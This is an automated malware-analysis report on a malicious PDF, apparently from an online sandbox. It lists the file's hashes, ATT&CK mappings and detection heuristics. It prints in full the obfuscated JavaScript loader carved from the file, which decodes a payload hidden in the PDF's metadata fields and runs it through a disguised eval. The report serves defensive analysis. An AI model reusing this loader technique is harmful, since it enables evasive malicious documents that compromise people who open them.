PDF malware analysis — malicious · bb5544d2686e4d24

MALICIOUS

PDF

32.0 KB Authoring application: G198G147G198G147G198G162G165G150G153G207G144G204G159G150G204G162G204G144G147G198G147G198G159G198G159G168G207G201G201G198G159G147G198G198G153G147G156G195G147G207G198G159G195G198G147G207G156G204G201G147 (via 204G159G162G204G195G168G207G153G207G144G198G159G198G159G198G159G198G153G198G159G147G198G198G153G147G201G204G159G150G204G198G159G147G198G198G153G153G156G144G201G165G207G147G195G147G198G147G198G150G159G) First seen: 2013-08-29

MD5: 78f4860f5cb8366851e0d40819a0be6d SHA-1: 5f0b428766cda79d52a665966ae861f4e3801a25 SHA-256: bb5544d2686e4d241e54224c548f4d49eda226220d32123e3c3a58e2edad32f5

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_IMAGE_ONLY_LURE heuristic suggests the document's visual content is not the primary focus, and the presence of a suspicious extracted artifact named 'javascript_obj0099_000.js' further points to script-based malicious activity. The embedded JavaScript is likely designed to download and execute a second-stage payload, although the exact mechanism is obfuscated.

Machine Learning

Nyx PDF Classifier malicious score 0.9996

Heuristics 6

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
var ttty=info["subject"];
function qwaerasdf(asd){return String.fromCharCode(asd);}
function hex2a(hex) {
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE

PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0099_000.js`	pdf-javascript-stream	PDF /JS object 99 at offset 0x7C7A	1555 bytes
SHA-256: `d221ce3594501a7a0780e56ce89bf1f30793e6af8dfc9eb4828966272ee03618`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script function rhjahahagk(){ function asdfasdoihoiasdf(input2){return Fde(input2);} function dec(input2) {var asfdsad ; var asdf =asdfasdoihoiasdf(input2) ; var asfdsad = hex2a(asdf); return asfdsad;} function Fde(str){var set='';var s='';var ee=''; str = str.replace(/G/g,","); str = str.split(","); for(var i=0;i<str.length;i++){ ee=str[i]/3; set+=asdfqwef(ee.toString(16));} return set; } function asdfewawea(sa){var ses = sa ;return ses;} var asfafa=info; var ss=asfafa.author;var hgh=asfafa.keywords; function ertenbui45(s){var adsfawheu = "0" ; return adsfawheu+asdfewawea(s);} function asdfqwef(eds){var set='';var s=eds; if (s.length<2) {set=ertenbui45(s);} else{set=s;} return set; } var ded=info.creator; var ttty=info["subject"]; function qwaerasdf(asd){return String.fromCharCode(asd);} function hex2a(hex) { var str = '';var zzz=qwaerasdf; for (var i = 0; i < hex.length; i += 2){ var sssss = hex.substr(i,2); str +=qwaerasdf('asdfwefwuiegfyuadsui0x'.substr(20,2)+sssss); } return str; } ss+=ttty+hgh; var dad=info.producer; function adsfquifhiwuf(d,dd){return d+dd;} ss+=adsfquifhiwuf(ded,dad); var ss=dec(ss); var dfawlfnewiojfiopwef = app.alert["adsfwefafdsfwefconstructorasdfwefasdf".substr(15,11)]; function asdfeaf(s){if (s==0){return false}else{return true}} var susea=asdfeaf(1)+""; var seasus=asdfeaf(0)+""; var daeaefe="eafadsfjekafhjkavadfefafaef"; var dudilda=susea[(3+3)/2]; dudilda+=daeaefe[(16+16)/2]; dudilda+=seasus[((1+9)/5)-1]; dudilda+=seasus[(2+10)/6]; dfawlfnewiojfiopwef[dudilda](ss); } rhjahahagk();

Open this report in the interactive analyzer, or submit your own file for analysis.